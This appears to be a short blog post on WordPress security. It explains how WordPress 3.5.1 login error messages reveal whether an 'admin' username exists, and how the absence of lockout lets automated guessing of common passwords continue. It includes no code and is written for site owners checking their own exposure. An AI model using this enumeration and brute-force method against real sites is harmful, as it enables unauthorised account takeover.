Is my site vulnerable?

There are many potential vulnerabilities but here we’ll just consider two.

  1. Administrator username of “admin”
  2. Easy to crack password

Administrator username of “admin”

With the current version of WordPress (3.5.1) it’s very easy to determine if the site has a user name of “admin”. Just attempt to login with the user name you want to test for. e.g. admin

If the user name is invalid you will get:

ERROR: Invalid username. Lost your password?

If the user name is valid you will either get:

ERROR: The password you entered for the username admin is incorrect. Lost your password?

OR you’ll be logged in 🙂

Note: This was raised as a bug (#12129 – Generic login failure message) a long time ago but it was closed as “wontfix”

Easy to crack password

Once you’ve determined that the user name is valid you can then try different passwords. By default WordPress does not lock you out after a certain number of failed attempts. An automated machine can try hundreds of the more common passwords. And it will keep going until it’s logged in or run out of ideas. It’s easy to find the 600 most common passwords. Some plugins even deliver a file that contains a list of them.

WordPress security – user names and passwords